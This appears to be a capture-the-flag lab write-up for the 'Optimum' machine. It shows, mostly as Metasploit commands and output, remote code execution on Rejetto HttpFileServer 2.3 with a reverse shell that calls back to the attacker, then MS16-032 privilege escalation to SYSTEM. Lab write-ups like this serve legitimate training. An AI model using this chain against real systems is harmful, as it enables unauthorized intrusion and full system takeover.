Optimum

From RCATs

NMAP

Start with our nmap scan with default scripts and version enumeration.

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-21 07:39 MST  
Nmap scan report for 10.129.29.30                
Host is up (0.058s latency).                                                                                                                                                                                                                   
Not shown: 999 filtered tcp ports (no-response)      
PORT   STATE SERVICE VERSION                                                                                                                                                                                                                   
80/tcp open  http    HttpFileServer httpd 2.3             
|_http-server-header: HFS 2.3                                   
|_http-title: HFS /                                              
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows                    
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .                                           
Nmap done: 1 IP address (1 host up) scanned in 19.68 seconds

USER

Using msfconsole Search fpr rejetto, the maker of the httpFileServer in use.

msf6 > search rejetto                                                                                                                                                                                                                          
Matching Modules                                                                                                                                                                                                                               
================                                                                                                                                                                                                                               
   #  Name                                   Disclosure Date  Rank       Check  Description                                                                                                                                                    
   -  ----                                   ---------------  ----       -----  -----------                                                                                                                                                    
   0  exploit/windows/http/rejetto_hfs_exec  2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution                                                                                                                
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec                                                                                                                                
msf6 > use 0

Set our RHOST and LHOST. Run then background the session to try and priv esc.

msf6 exploit(windows/http/rejetto_hfs_exec) > run                                                                                                                                                                                              

[*] Started reverse TCP handler on 10.10.16.18:4444                                                                                                                                                                                            
[*] Using URL: http://10.10.16.18:8080/qqFRSJByHJj                                                                                                                                                                                             
[*] Server started.                                                                                                                                                                                                                            
[*] Sending a malicious request to /                                                                                                                                                                                                           
[*] Payload request received: /qqFRSJByHJj                                                                                                                                                                                                     
[*] Sending stage (175686 bytes) to 10.129.29.30                                                                                                                                                                                               
[!] Tried to delete %TEMP%\oWmXpBMw.vbs, unknown result                                                                                                                                                                                        
[*] Meterpreter session 1 opened (10.10.10.10:4444 -> 10.129.29.30:49162) at 2022-12-21 07:42:16 -0700

meterpreter > shell                                                                                                                                                                                                                            
Process 2764 created.                                                                                                                                                                                                                          
Channel 2 created.                                                                                                                                                                                                                             
Microsoft Windows [Version 6.3.9600]                                                                                                                                                                                                           
(c) 2013 Microsoft Corporation. All rights reserved.                                                                                                                                                                                           
use C:\Users\kostas\Desktop>whoami                                                                                                                                                                                                                 
whoami                                                                                                                                                                                                                                         
optimum\kostas

PRIV ESC

Run exploit suggester and try the options that potentially work.

msf6 post(multi/recon/local_exploit_suggester) > set session 2                                                                                                                                                                                 
session => 2                                                                                                                                                                                                                                   
msf6 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.129.29.30 - Collecting local exploits for x86/windows...                                                                                                                                                                                
[*] 10.129.29.30 - 174 exploit checks are being tried...
[+] 10.129.29.30 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.129.29.30 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 41 / 41
[*] 10.129.29.30 - Valid modules for session 2:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.

...<SNIP>...

[*] Post module execution completed

exploit/windows/local/bypassuac_eventvwr did not work so we try next on the next exploit/windows/local/ms16_032_secondary_logon_handle_privesc works!

msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set session 2                                                                                                                                                            
session => 2                                                                                                                                                                                                                                   
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lhost 10.10.10.10                                                                                                                                                    
lhost => 10.10.10.10                                                                                                                                                                                                                           
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set lport 4445                                                                                                                                                           
lport => 4445  
msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit                                                                                                                                                                  

[*] Started reverse TCP handler on 10.10.16.18:4445                                                                                                                                                                                            
[+] Compressed size: 1160                                                                                                                                                                                                                      
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell                                                                                                                                                                         
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\dnzbSYP.ps1...                                                                                                                                                                    
[*] Compressing script contents...                                                                                                                                                                                                             
[+] Compressed size: 3755                                                                                                                                                                                                                      
[*] Executing exploit script...       

meterpreter > shell
Process 3016 created.
Channel 1 created.
iMicrosoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\kostas\Desktop>whoami
whoami
nt authority\system

# Flag
C:\Users\Administrator\Desktop>more root.txt
more root.txt